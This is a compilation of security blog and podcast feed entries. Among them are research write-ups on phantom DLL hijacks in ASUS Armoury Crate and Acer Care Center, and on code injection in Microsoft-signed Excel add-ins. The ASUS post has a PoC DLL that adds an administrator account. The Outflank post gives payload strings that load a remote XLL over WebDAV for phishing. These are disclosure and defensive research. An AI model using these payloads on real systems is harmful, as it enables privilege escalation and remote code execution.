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How to work in cloud security | Guest Menachem Shafran

By: Infosec
13 December 2021 at 08:00

On today’s podcast, Menachem Shafran of XM Cyber talks about cloud security. Menachem tells us about the work of project manager and product manager, how the haste to migrate to the cloud can unnecessarily leave vulnerabilities wide open and why a cloud security expert also needs to be a good storyteller.

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
2:40 - Getting into cybersecurity
5:47 - Project manager in cybersecurity
9:12 - Identifying pain points
10:24 - Working as a VP of product
14:09 - Data breaches
16:30 - Critical versus non-critical data breaches
18:19 - Attacker’s market 
19:38 - How do we secure the cloud?
22:45 - A safer cycle of teams
24:40 - How to implement cybersecurity changes
28:50 - How to work in cloud security
30:48 - A good cloud security resume 
33:02 - Work from home and cloud security
34:30 - XM Cyber’s services 
37:21 - Learn more about Menachem
38:00 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


High-tech hacking tools and how to defend against them | Guest Bentsi Ben-Atar

By: Infosec
20 December 2021 at 08:00

Bentsi Ben-Atar of Sepio Systems talks about some truly scary high-tech hacking weapons and techniques, from Raspberry Pis in your mouse or keyboard to charging cables that can exfiltrate data from a mile away. What do we do? How do we prepare?

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
3:18 - Getting into cybersecurity
4:30 - Career highlights 
5:50 - Co-founding two companies 
7:22 - Typical work day at CTO and CMO
11:29 - New stealthy hacking tools
13:08 - Hacking a smart copy machine
17:46 - Stealing data with a Raspberry Pi
26:01 - The ninja cable 
32:11 - Security awareness while traveling 
35:20 - How to work battling high-tech cybercrime
36:35 - Exploring cybersecurity 
37:47 - More about Bentsi’s companies
39:31 - Find more about Bentsi 
39:57 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


🇮🇹 Stealing weapons from the Armoury

By: ["last"]
24 September 2021 at 00:00

armoury pwnd


Il software ASUS ROG Armoury Crate installa un servizio chiamato Armoury Crate Lite Service, vulnerabile a phantom DLL hijacking. Ciò permette a un utente non privilegiato di eseguire codice nel contesto di altri utenti, amministratori inclusi. Per sfruttare la vulnerabilità, un amministratore deve autenticarsi sulla macchina compromessa dopo che un attaccante ha posizionato una DLL malevola nel path C:\ProgramData\ASUS\GamingCenterLib\.DLL. ASUS ha fixato la vulnerabilità, a cui il MITRE ha assegnato l’ID CVE-2021-40981, rilasciando la versione v4.2.10 di Armoury Crate Lite Service.


Salve compagni di viaggio, è last che vi scrive! Recentemente mi sono messo alla ricerca di qualche vulnerabilità qua e là (devo lavorare sull’impiego del mio tempo libero, lo so). Più precisamente mi sono concentrato su un particolare tipo di vulnerabilità chiamato phantom DLL hijacking (“statece”, lo lascio in inglese che tradotto faceva un po’ schifarcazzo pietà) che su Windows può portare, nel migliore dei casi, a backdoor negli applicativi o, nel peggiore dei casi, a bypass di UAC e/o privilege escalation.

I phantom DLL hijacking sono una sottocategoria dei DLL hijacking, un tipo di vulnerabilità in cui un attaccante forza un processo vittima a caricare una DLL arbitraria, sostituendola a quella legittima. Si dicono phantom quando la DLL in questione è proprio assente nel filesystem, mentre quelli classici vanno a sostituire una DLL che invece è presente.

Ricordiamo cos’è una DLL per chi si fosse perso: una Dynamic-Link Library (DLL) è un tipo di Portable Executable (PE) su Windows, come i famigerati .exe, con la differenza che essa non è eseguibile con un normale doppio-click, ma deve essere importata da un processo in esecuzione. Una volta importata, il processo esegue il contenuto della funzione DllMain presente all’interno della DLL e può usufruire delle funzioni esportate dalla stessa. Per gli amanti del software libero, le DLL sono essenzialmente lo stesso concetto dei file .so su Linux (come la libc). Come accennato, il codice della DllMain viene eseguito nel contesto del processo che importa la DLL stessa, significando che, se la DLL dovesse essere caricata da un processo con un token privilegiato, il codice della DLL verrebbe eseguito in un contesto privilegiato.

Tornando a noi, giocando con Process Monitor sono riuscito a trovare un phantom DLL hijacking in ASUS ROG Armoury Crate, un software che è molto facile trovare in PC e laptop da gaming con una scheda madre TUF/ROG per gestire LED e ventole di raffreddamento.

such gaming much 0days gif

L’anno scorso ho assemblato un PC con una scheda madre ASUS TUF (i cugini sfigati di Roma Nord di ASUS ROG) e mi sono ritrovato questa meraviglia di software installato. Tendenzialmente questo tipo di software non è pensato per essere sicuro - non me la sto prendendo con ASUS, vale lo stesso per le altre case produttrici (ehm ehm… Acer… ehm ehm). È questo il motivo per cui ho deciso di concentrare i miei sforzi su questo genere di software, la pigrizia vera.

Al momento del login il servizio di Armoury Crate, fantasiosamente chiamato Armoury Crate Lite Service, crea una serie di processi, fra i quali troviamo ArmouryCrate.Service.exe e il processo figlio ArmouryCrate.UserSessionHelper.exe. Come potete vedere dal prossimo screenshot, il primo possiede un token SYSTEM, mentre il figlio, nel caso di utenti amministratori, uno ad alta integrità - per saperne di più riguardo al concetto di integrità clicca qui. Nel caso in cui l’utente autenticato non sia amministratore, ArmouryCrate.UserSessionHelper.exe esegue a integrità media. Tenetelo a mente, ci tornerà utile più avanti.

armourycrate arch

Si va a caccia

Ora che abbiamo una vaga idea di quale sia il nostro target, passiamo ad analizzare l’approccio che useremo per cercare la vulnerabilità:

  1. Isolare tutte le chiamate che portano a una CreateFile tramite Process Monitor e che hanno come risultato “NO SUCH FILE” o “PATH NOT FOUND”;
  2. Ispezioniamo il call stack (la sequenza di funzioni chiamate all’interno del codice) per accertarci che la CreateFile avvenga a seguito di una chiamata a una funzione appartenente alla famiglia delle funzioni LoadLibrary (come LoadLibraryA, LoadLibraryW, LoadLibraryExW o le loro corrispondenti native dentro ntdll). N.B. CreateFile su Windows è un mezzo false friend, non serve solo a “creare file”, ma anche ad aprirne di già esistenti;
  3. Prendiamo nota del percorso sul filesystem da cui viene caricata la DLL e assicuriamoci che un utente non privilegiato abbia permessi di scrittura sul percorso stesso;
  4. Profit!

Andare a caccia di questo genere di vulnerabilità è abbastanza semplice in realtà e la metodologia segue quella che ho già spiegato in questo thread su Twitter: bisogna avviare Process Monitor con privilegi amministrativi, impostare alcuni filtri e ispezionare i risultati. Dal momento che siamo interessati solo ed esclusivamente a phantom DLL hijacking in grado di portare a privilege escalation (backdoor e UAC bypass li lasciamo agli skid) imposteremo il nostro filtro per mostrarci solo i processi privilegiati (ossia con integrità >= ad alta) con operazioni di caricamento DLL che falliscono con PATH NOT FOUND o NO SUCH FILE. Per aprire la mascherina del filtro su Process Monitor cliccate su Filter -> Filter.... Vediamo quali filtri impostare per filtrare tutte le operazioni che non rispondono ai canoni riportati:

  • Operation - is - CreateFile - Include
  • Result - contains - not found - Include
  • Result - contains - no such - Include
  • Path - ends with - .dll - Include
  • Integrity - is - System - Include
  • Integrity - is - High - Include

procmon filters

Impostati i filtri corretti tornate sulla barra del menu e salvate il filtro cliccando Filter -> Save Filter... così che possiamo riutilizzarlo dopo. Visto che molti processi e servizi ad alta integrità vengono eseguiti all’atto dell’autenticazione dell’utente o all’avvio, dobbiamo instrumentare Process Monitor affinché tenga traccia del processo di boot e di login. Per fare ciò tornate sulla barra del menu e cliccate Options -> Enable Boot Logging, lasciate il resto ai valori di default, chiudete Process Monitor e riavviate il dispositivo. Dopo esservi riautenticati, riaprite Process Monitor e salvate il file Bootlog.pml contenente tutto il tracing dell’avvio fatto da Process Monitor. Una volta salvato, Process Monitor procederà automaticamente a parsarlo e a mostrarvi i risultati. Tornate sulla barra dei menu, premete Filter -> Load Filter, caricate il filtro salvato precedentemente e dovreste trovare qualche riga di operazioni, se siete fortunati e non avete sbagliato nulla. Tutto ciò che vedete potrebbe portare a phantom DLL hijacking.

armoury missing DLL

È ora di investigare i risultati! Nel caso di Armoury Crate, potete vedere che cerca di caricare un file chiamato .DLL posizionato nel path C:\ProgramData\ASUS\GamingCenterLib\.DLL. Tale path è molto interessante, in quanto, diversamente dalle sottocartelle di C:\Program Files\, le sottocartelle di C:\ProgramData\ non hanno ACL sicure di default e quindi è estremamente probabile che un utente non privilegiato sia in grado di scrivere in una di esse.

Per assicurarci che le operazioni CreateFile relative agli eventi che stiamo osservando siano effettivamente conseguenza di una chiamata a una funzione della famiglia LoadLibrary, possiamo aprire l’evento (doppio click sullo stesso), aprire la tab Stack e dare un’occhiata alla pila di funzioni chiamate. Come potete vedere dallo screenshot, nel caso di Armoury Crate la CreateFile avviene a seguito di una chiamata a LoadLibraryExW:

armoury crate loadlibrary

Per assicurarci che le ACL della directory C:\ProgramData\ASUS\GamingCenterLib\ siano lasche possiamo usare il convenientissimo cmdlet Powershell Get-Acl così:

Get-Acl 'C:\ProgramData\ASUS\GamingCenterLib' | Select-Object *

Questo comando ci restituisce una stringa contenente le ACL in formato SDDL (Security Descriptor Definition Language), che può essere interpretata in maniera comprensibile da un umano tramite il cmdlet ConvertFrom-SddlString. Tramite tale comando possiamo notare che il gruppo BUILTIN\Users ha accesso con privilegi di scrittura sul path in questione:

armoury acls

Un modo molto più becero ma ugualmente funzionale di verificare le ACL di un oggetto su Windows è tramite la tab View effective access, nascosta nelle proprietà dell’oggetto stesso (che nel nostro caso è la cartella C:\ProgramData\ASUS\GamingCenterLib\). Per visualizzare “l’accesso effettivo” che un utente o un gruppo di utenti ha tramite questa funzionalità basta aprire le proprietà della cartella, cliccare sulla tab Security, poi Advanced, selezionare un utente o un gruppo di utenti (nel mio caso ho usato un utente di test non amministratore) e premere su View effective access. Il risultato di questa operazione è una mascherina che mostra quali privilegi ha il singolo utente sulla cartella, mettendolo a sistema con i gruppi di cui fa parte.

armoury acls gui

Ora che sappiamo che chiunque ha privilegi di scrittura su C:\ProgramData\ASUS\GamingCenterLib\ dobbiamo solo compilare una DLL contenente il codice che vogliamo eseguire e “dropparla” su disco a quel path con il nome .DLL. Come PoC useremo una semplice DLL che aggiungerà un nuovo utente chiamato aptortellini con password aptortellini e gli darà privilegi amministrativi aggiungendolo al gruppo degli amministratori locali.

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    system("C:\\Windows\\System32\\cmd.exe /c \"net user aptortellini aptortellini /add\"");
    system("C:\\Windows\\System32\\cmd.exe /c \"net localgroup administrators aptortellini /add\"");
    return TRUE;

Ora che abbiamo tutto pronto dobbiamo solo aspettare che un utente amministratore si autentichi sulla macchina. Questo è necessario poiché la DLL in questione viene caricata dal processo ArmouryCrate.UserSessionHelper.exe che, come abbiamo detto all’inizio dell’articolo, esegue con i privilegi massimi consentiti all’utente autenticato. Al momento dell’autenticazione di un utente amministratore ci ritroveremo con un nuovo utente amministratore, confermando la privilege escalation.

Root cause analysis

Vediamo adesso brevemente cosa ha causato la vulnerabilità in questione. Come si evince dal call stack mostrato in uno degli screenshot precedenti, la chiamata a LoadLibraryExW avviene all’offset 0x167d nella funzione QueryLibrary, all’interno della DLL GameBoxPlugin.dll caricata dal processo ArmouryCrate.UserSessionHelper.exe. Reversando la DLL tramite IDA Pro si può inoltre osservare che la maggior parte delle funzioni in questa DLL hanno una sorta di forma di logging che contiene il nome originale della funzione chiamante. Da ciò si può evincere che la funzione responsabile della chiamata a LoadLibraryExW è la funzione DllLoadLibraryImplement:

ida call

In questo caso abbiamo due “colpevoli”:

  1. Una DLL è caricata senza nessuna forma di check. ASUS ha fixato questa problematica implementando un check crittografico nelle nuove versioni di Armoury Crate Lite Service per assicurarsi che le DLL caricate siano firmate da ASUS;
  2. Le ACL della directory C:\ProgramData\ASUS\GamingCenterLib\ non sono impostate nella maniera corretta. Questa cosa non è stata fixata da ASUS, significando che se in futuro una problematica del genere dovesse riverificarsi, ci sarebbero i presupposti per una nuova vulnerabilità. Il processo ArmouryCrate.UserSessionHelper.exe tra l’altro cerca nella stessa directory delle DLL con un nome rispondente alla wildcard ??????.DLL, cosa che potrebbe essere exploitabile. Consiglio di fixare “a mano” le ACL della cartella in questione e rimuovere i privilegi di scrittura a tutti gli utenti non membri del gruppo degli amministratori locali.

Responsible disclosure timeline (YYYY/MM/DD)

  • 2021/09/06: vulnerabilità riportata ad ASUS tramite il loro portale di disclosure;
  • 2021/09/10: ASUS conferma di aver ricevuto il report e lo inoltra al suo team di sviluppo;
  • 2021/09/13: Il team di sviluppo conferma la presenza della vulnerabilità e afferma che sarà fixata nella successiva release, prevista per la 39esima settimana dell’anno in corso(27/09 - 01/10);
  • 2021/09/24: ASUS conferma che la vulnerabilità è stata fixata nella versione 4.2.10 del servizio;
  • 2021/09/27: il MITRE assegna il CVE con codice CVE-2021-40981 a questa vulnerabilità;

Kudos ad ASUS per la celerità e professionalità nella gestione della vulnerabilità. È tutto per oggi e alla prossima!

last out!

Security risks facing streamers on Twitch and YouTube | Guest Roderick Jones

By: Infosec
3 January 2022 at 08:00

Roderick Jones of Concentric talks about security risks facing content creators, influencers, gamers and streamers on Twitch, YouTube and elsewhere. Online harassment is often seen as “part of the package” if you’re going to work in a public-facing streamer community, but Jones knows that this isn’t inevitable, and it is fixable. A future without a shrug-shoulders approach to online abuse?

– Create your free Infosec Skills account:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
3:37 - How did you get into cybersecurity?
5:30 - Were you scouted for your role? 
6:44 - How did the landscape change?
8:40 - Security intelligence to private sector
11:50 - Daily work at Concentric 
13:25 - Staying up on trends
15:09 - Gaming, streaming and security issues
21:31 - Desentization and online personalities 
25:42 - The future of online access
27:37 - How to protect streamers
31:40 - Censoring on streaming platforms with AI
35:06 - Safeguards streams should have in place
40:06 - Cybersecurity jobs related to streaming security 
41:58 - Being courteous online 
42:43 - More about Concentric
43:58 - Learn more about Jones
44:35 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


What does a penetration tester do? | Cybersecurity Career Series

By: Infosec
6 January 2022 at 08:00

Penetration testers, or ethical hackers, are responsible for planning and performing authorized, simulated attacks within an organization’s information systems, networks, applications and infrastructure to identify vulnerabilities and weaknesses. Findings are documented in reports to advise clients on how to lower or mitigate risk. Penetration testers often specialize in a number of areas such as networks and infrastructures, Windows, Linux and Mac operating systems, embedded computer systems, web/mobile applications, supervisory control data acquisition (SCADA) control systems, cloud systems and internet of things (IoT) devices.

– Start learning cybersecurity for free:
– Learn more about the role of penetration tester:

0:00 - Intro 
0:26 - What does a penetration tester do? 
1:10 - Levels of penetration testers
1:50 - How to become a penetration tester
3:08 - Education needed to be a pentester
3:50 - Skills needed to pentest
4:24 - Common tools of the pentester
5:07 - Training with the tools
5:42 - Job options for pentesters
6:36 - Work duty expectations
7:45 - Can you move to a different role?
9:09 - What can I do to become a pentester?
9:54 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


A phishing document signed by Microsoft – part 2

7 January 2022 at 10:13

This is the second part of our blog series in which we walk you through the steps of finding and weaponising other vulnerabilities in Microsoft signed add-ins. Our previous post described how a Microsoft-signed Analysis Toolpak Excel add-in (.XLAM) was vulnerable to code hijacking by loading an attacker controlled XLL via abuse of the RegisterXLL function.

In this post we will dive deep into a second code injection vulnerability in the Analysis Toolpak in relation to the use of the ExecuteExcel4Macro function in a Microsoft-signed Excel add-in. Furthermore, we will show that the Solver add-in is vulnerable to a similar weaknesses with yet another vector. In particular, we will discuss:

  • Walkthrough of the Analysis Toolpak code injection vulnerability patched by CVE-2021-28449
  • Exploitation gadgets for practical weaponisation of such a vulnerability
  • Weakness in Solver Add-in
  • Our analysis of Microsoft’s patch

Excel4 macro code injection

During execution of the Analysis Toolpak, the Microsoft-signed and macro-enabled file ATPVBAEN.XLAM uses macros to load ANALYS32.XLL and registers the functions in this XLL file to be used in formulas in cells. In this process, a call is made to the ExecuteExcel4Macro VBA function, passing a string that will be executed as Excel4 macro code. Part of this string is user controlled. Hence, it is possible to hijack the Excel4 macro execution flow and exploit it to run injected code.

Note: for full VBA source code, or to follow the exploitation steps along, you can download the original/vulnerable XLAM here (and run olevba to display the VBA code).

The vulnerable code snippet can be found below (note that ampersands are concatenations):

Private Sub RegisterFunctionIDs()
    XLLName = ThisWorkbook.Sheets("Loc Table").Range(XLLNameCell).Value
    Quote = String(1, 34)
    For i = LBound(FunctionIDs) To UBound(FunctionIDs)
        Dim StrCall
        StrCall = "REGISTER.ID(" & Quote & AnalysisPath & XLLName & Quote & "," & Quote & FunctionIDs(i, 0) & Quote & ")"
        FunctionIDs(i, 1) = ExecuteExcel4Macro(StrCall)
    Next i
End Sub
  • The vulnerability resides in the VBA function RegisterFunctionIDs, where the Analysis Toolpak XLL is registered using a call to ExecuteExcel4Macro.
  • The variables XLLName and AnalysisPath point to cells and are not affected by VBA code signing.
  • As such, the attacker can control their contents by modifying the XLAM cell contents and thereby partly control the input to ExecuteExcel4Macro.

However, in practice this vulnerability is more difficult to exploit since the attacker-controlled input (cell contents) is already partly validated in the function VerifyOpen, which gets called before RegisterFunctionIDs.

Sub auto_open()
    Application.EnableCancelKey = xlDisabled
End Sub

If the XLL was not successfully registered, the worksheet would have closed in the last line of VerifyOpen, as shown in a simplified version of this function:

Private Sub VerifyOpen()       
    ' Outflank: Removed many lines for readability
    XLLName = ThisWorkbook.Sheets("Loc Table").Range(XLLNameCell).Value
    ' Outflank: Removed many lines for readability
    XLLFound = Application.RegisterXLL(LibPath & XLLName)
    If (XLLFound) Then
        Exit Sub
    End If
    XLLNotFoundErr = ThisWorkbook.Sheets("Loc Table").Range("B12").Value
    MsgBox (XLLNotFoundErr)
    ThisWorkbook.Close (False)
End Sub

Fortunately, we can get around this: the VerifyOpen function validates whether an XLL file exists on a given location, but does not validate whether there are ‘side effects’ in the path that could influence the execution within ExecuteExcel4Macro. It should be noted that injecting a double quote () is allowed in the input validation check, but will terminate the ‘Register’ Excel4 macro string. We can use this trick to inject calls to other Excel4 functions.

Since the call to RegisterXLL may not result in XLLNotFoundErr (input path should point to existing XLL on disk), we need to meet some conditions to hijack the Excel4 Macro code execution flow for weaponising this.

Basic weaponisation vector

The RegisterXLL function interprets the input as a Windows path while ExecuteExcel4Macro interprets it as a string. RegisterXLL simplifies the given path and allows to hide code in a directory traversal:

Payload: Changed XLLName cell B8 to
Library\" & exec("calc.exe"), "\..\Analysis\ANALYS32.XLL

The exploit string is then injected into the target function as follows:

ExecuteExcel4Macro(REGISTER.ID("Library\" & exec("calc.exe"), "\..\Analysis\ANALYS32.XLL","…"))

The relative referencing of ANALYS32.XLL is possible because Excel also searches for the XLL in the Office installation path.

This PoC exploit string demonstrates the execution of local binaries from the system. It starts calc.exe. It can be used together with LOLBINS to create a dropper for persistency and/or gain remote code execution.

Now, to fully weaponise this, we want to execute a malicious remote XLL or PE executable.

Building blocks for remote weaponisation

To weaponise this for loading a remote XLL or to run a remote PE executable, we need some more building blocks / gadgets to bypass technical constraints. We developed various building blocks that allowed us to bypass the input validation:

  • Remote loading
    • It does not seem possible to load a remote XLL directly via http(s), therefor we try loading via WebDAV.
  • Load an XLL over WebDAV into the current process
    • The REGISTER function can load XLLs and is allowed to make WebDAV calls once the WebClient service is running.
  • Starting WebClient/webDAV service
    • Starting the WebClient service for WebDAV accessibility usually requires a manual action and administrative privileges. However, some Windows API calls (and Excel functionality using these) are allowed to start the service automagically from a normal user context.
    • The Excel4 function RUN can be used for this purpose, pointing to a (empty) remote webDAV-hosted Excel document. The WebClient service will then be automatically stated on the victim machine if it was not yet running. Note: RUN cannot load XLLs, that is why both functions are required.
    • The remote Excel document can be of different types. We loaded an XLAM add-in instead of a more regular XLSX worksheet. Pointing the RUN to an XLSX will open a new window on the victim machine while an XLAM loads the add-in in the current window. An empty XLAM (without macros) is used in our case.
  • Function restrictions
    • We run multiple Excel4 commands in a concatenated context: only Excel4 instructions/functions that return a value can be used. Cell assignments are not available, for instance.
  • Path traversal
    • Using a path traversal (\..\), it is possible to inject valid Excel4 macro code in a string that is interpreted as a path. The RegisterXLL function as used in VerifyOpen interprets the input as a Windows Path while ExecuteExcel4Macro interprets it as a string. RegisterXLL simplifies the given path and as such allows to hide code, and then discard the injected code via directory traversal. 
    • When injecting code with slashes every forward or backward slash should be compensated for with an extra directory traversal (..\) to keep the relative reference valid. Double slashes are counted as one.
  • Character restrictions
    Not all characters are allowed in paths.
    • Some special characters are not allowed in the path for RegisterXLL, however “,\ and . are.
  • Relative referencing
    To meet the VerifyOpen check, it is required to point to an existing XLL. To target users with different MS Office versions and support both x64 and x86 install of Office, the following trick can be used:
    • Relative referencing of files in the Office installation directory is possible. This allows the attacker to find a XLL regardless of Office version or Office bitness in \Library\Analysis\Analys32.xll where Analys32.xll is always of the same bitness as the Office install.
    • Relative references can even be used if the Excel file is opened from a network share / USB drive, because the Excel will always search for the XLLname in the Office installation directory on the C: drive.
  • Implementation
    • We inject in a for loop of 37 elements, so our payload is executed multiple (37) times. To circumvent this, it is possible to break out of the for loop and throw an error. Another simple approach is to limit XLL payload launches to once using Windows Mutexes within the loaded malicious XLL.

Full weaponisation

A Proof of Concept to start the WebClient service and load an XLL over WebDAV. The RUN command loads a remote empty xlam to enable WebDAV. The REGISTER command then loads a remote XLL. Simplified exploit:

Payload used in the image above: Change XLLName cell B8 to value:

Library\H" & RUN("'[x.xlam]s'!A1") & REGISTER("\\\w\demo64.dat"), "\..\..\..\..\..\..\..\Analysis\ANALYS32.XLL

The exploit above, loads a remote XLL. However, the bitness (x64/x86) of the XLL should match the bitness of Excel.

Like in the previous blog post, we will create a formula to make sure that the correct bitness is used so that our exploit works for both x64 and x86.

The XLLName cell B8 could consist of a formula concatenating three cells together (i.e. C7 & C8 & C9 ), in this order:

Library\H" & RUN("'[x.xlam]s'!A1") & REGISTER("
= "\\\w\demo" & IF(ISERROR(SEARCH("64";INFO("OSVERSION"))); "32"; "64") & ".dat"
"), "\..\..\..\..\..\..\..\Analysis\ANALYS32.XLL

The resulting document effectively exploited all recent versions of MS Office (x86+x64) prior to the patch, for any Windows version, against (un)privileged users, without any prior knowledge of the target environment. Furthermore, as shown in the previous blog post, it was possible to change the filetype to xlsm and xls. Plus, the certificate was already installed as trusted publisher in some cases. An ideal phishing document!

Yet another add-in and vector; solver.xlam

In the default MS Office install, there is another add-in which is vulnerable to a very similar abuse. The Solver.xlam file provides functionality to find optimal values under specific constraints. 

The solver add-in is implemented as an XLAM that loads a file named Solver.dll in VBA code and uses the function ExecuteExcel4Macro with contents that are partly attacker-controlled.

In this case, the VBA macro uses a private declare to reference external procedures in a DLL.

Private Declare PtrSafe Function Solv Lib "Solver32.dll" (ByVal object, ByVal app, ByVal wkb, ByVal x As Long) As Long

This can be abused by delivering solver.xlam alongside an attacker controlled file named ‘Solver32.dll’ in the same directory (e.g. in a zip). External references in signed code are yet another vector that can result in “signature abuse” for code execution.

Furthermore, ExcecuteExcel4 macro’s are being called on possible attacker/user controlled input.

GetName = Application.ExecuteExcel4Macro("GET.DEF(" & Chr(34) & Application.ConvertFormula(Range(the_address).Address, xlA1, xlR1C1) & Chr(34) & "," & Chr(34) & GlobalSheetName & Chr(34) & ")")

Microsoft also addressed these instances in their April patch.

Microsoft’s mitigation

Microsoft acknowledged the vulnerability, assigned it and patched it 5 months after our vulnerability notification. 

As explained in the previous blog post, new validations were introduced to limit the loading of unsigned XLLs from a signed context. This would block the WebDAV XLL loading. However as demonstrated in this blog, there are other mechanisms to execute code that are not blocked by this.

We have not fully reversed the Excel patch, but based on behavior of Excel when opening the new (after patch) and old (before patch) files, we believe the following has been implemented to mitigate further abuse:

  • Newer versions of Excel check the timestamp of signing to ensure only Microsoft XLAMs signed after this update are allowed.
  • In newer Office versions the XLAM macro code in the Analysis Toolpak has various forms of input validation, either escaping quotes and hardcoded paths as input to the Excel4 function, or by changing directories to the Office install directory prior to loading a function from an external DLL to ensure the DLL is loaded from the installed Office.
  • In addition, Microsoft introduced features to disable Excel4 when VBA macros are enabled.

Trying to load the vulnerable, old XLAM (or XLA) on a patched Office installation, will now result in the following Security Notice without option to execute anyway:

This was a nice journey into another obscure area of MS Office. Achievements: a new security registry setting, a new warning dialogue and someone at Microsoft writing legit Excel4 macro code in 2021.

With this blog series we hope to have inspired you to do your own research into features which exist in MS Office for decades, but have largely been unexplored by security researchers. Such archaic features of MS Office can be a true gold mine from an offensive perspective.

For questions and comments, please reach out to us on Twitter @ptrpieter and @DaWouw.

The post A phishing document signed by Microsoft – part 2 appeared first on Outflank.

Predictions for cybersecurity in 2022 | Guest Andrew Howard

By: Infosec
10 January 2022 at 08:00

Andrew Howard, CEO of Kudelski Security, returns to give us his cybersecurity predictions for 2022! How will cybersecurity protect the supply chain, why is quantum computing on all of his clients' minds, and how would Andrew rewrite security from the ground up if a genie granted him three wishes?

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
3:00 - Getting into cybersecurity
4:00 - How has the cloud evolved?
6:46 - The past year in cybersecurity
8:20 - The next cybersecurity innovation 
8:57 - Where quantum computing is going
10:15 - Concerns about encryption data
10:54 - The state of ransomware
12:57 - Cybersecurity supply chain issues. 
16:18 - Hybrid work cybersecurity
18:42 - The year of cyber insurance
20:35 - DOD directive to close security gaps
22:15 - What would you change in cybersecurity?
25:45 - What would put phishing out of mind? 
28:10 - Advice to 2022 cybersecurity students 
29:37 - Kudelski Security 
30:58 - Blockchain security in 2022
31:57 - Learn more about Kudelski
32:10 - Outro   

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


What does a security manager do? | Cybersecurity Career Series

By: Infosec
13 January 2022 at 08:00

Security managers develop security strategies that align with the organization's goals and objectives. In addition, they direct and monitor security policies, regulations and rules that the technical team implements. Knowledge in areas like information security governance, program development and management, incident response and risk management are important to success in any security management role.

– Start learning cybersecurity for free:
– Learn more the security manager role:

0:00 - Intro 
0:26 - What does a security manager do? 
3:15 - How do you become a security manager?
4:54 - What education is required for security managers?
5:55 - What certificates are required for security managers?
7:23 - What skills does a security manager need to have?
9:58 - Common tools security managers use
11:48 - Where do security managers work?
13:45 - How well do security managers pivot into other roles?
15:36 - What step can someone take now to become a security manager?
17:27 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


🇬🇧 The ace(r) up your sleeve!

By: ["last"]
20 January 2022 at 00:00

acer pwnd


Acer ships most of the laptop it sells with a software suite called Care Center Service installed. In versions up to 4.00.3034 included, one of the suite’s programs is an executable named ListCheck.exe, which runs at logon with the highest privilege available and suffers from a phantom DLL hijacking. This can lead to a privilege escalation when an administrator logs in. The vulnerability has been assigned ID CVE-2021-45975


Greetings mates, last here! As I previously mentioned, lately I’ve been busy hunting for vulnerabilities and I ended up finding another privilege escalation in one of those softwares computer manufacturers put in the computers they sell. This time it ended up being in Care Center Service, a software suite Acer uses to keep devices they build updated. I won’t delve into the details of how I found the vulnerability, as it’s pretty much the same methodology I explained in the post about a similar vulnerability in an ASUS product I found last October.

The vulnerability

As with ASUS’ one, this vulnerability is a phantom DLL hijacking. At user logon, a scheduled task named “Software Update Application”, created when Acer Care Center is installed, runs a binary named ListCheck.exe. As specified in the scheduled task configuration, the binary runs with the highest privileges available to the logged on user (which means high integrity if the user is part of the BUILTIN\Administrators group). The process spawned then tries to load profapi.dll by first looking into the C:\ProgramData\OEM\UpgradeTool\ directory.

listcheck missing dll

The ACL of said directory is not properly configured (and often they are not for subfolders of C:\ProgramData\), meaning an unprivileged user has write access to it and thus can place there a malicious profapi.dll which will be loaded by ListCheck.exe and executed.

lax permissions

This means that, if a privileged user logs on, the malicious profapi.dll will be loaded and executed at high integrity, effectively running arbitrary malicious code as an administrator and achieving a privilege escalation.

Patch and workaround

Acer had released a patch for Acer Care Center on the 27th of December 2021 in order to fix the vulnerability. To prevent the vulnerability from being exploited before the patch is applied, simply disable the “Software Update Application” scheduled task.

Responsible disclosure timeline (YYYY/MM/DD)

That’s all for today folks, see you next time!

last out!

🇮🇹 The ace(r) up your sleeve!

By: ["last"]
20 January 2022 at 00:00

acer pwnd


Acer installa nella maggior parte dei computer che produce una suite di software chiamata Care Center Service, che contiene un programma chiamato ListCheck.exe che viene eseguito all’avvio con i massimi privilegi consentiti all’utente. Fino alla versione 4.00.3034 inclusa di Care Center, tale eseguibile ha una vulnerabilità di tipo phantom DLL hijacking che può portare a privilege escalation nel caso un amministratore si autentichi sul dispositivo. Alla vulnerabilità è stato assegnato l’identificativo CVE-2021-45975.


Salve a tutti, è di nuovo last a infastidirvi. Nella mia continua ricerca di disagi esadecimali mi sono imbattuto in un altro software vulnerabile a privilege escalation. Questa volta è stato il turno di Care Center Service, una suite software che Acer installa nella maggior parte dei dispositivi che vende. Non mi soffermerò su come ho trovato la vulnerabilità in questione, perché il metodo è letteralmente lo stesso che ho utilizzato per trovare una vulnerabilità identica in un software prodotto da ASUS lo scorso ottobre.

La vulnerabilità

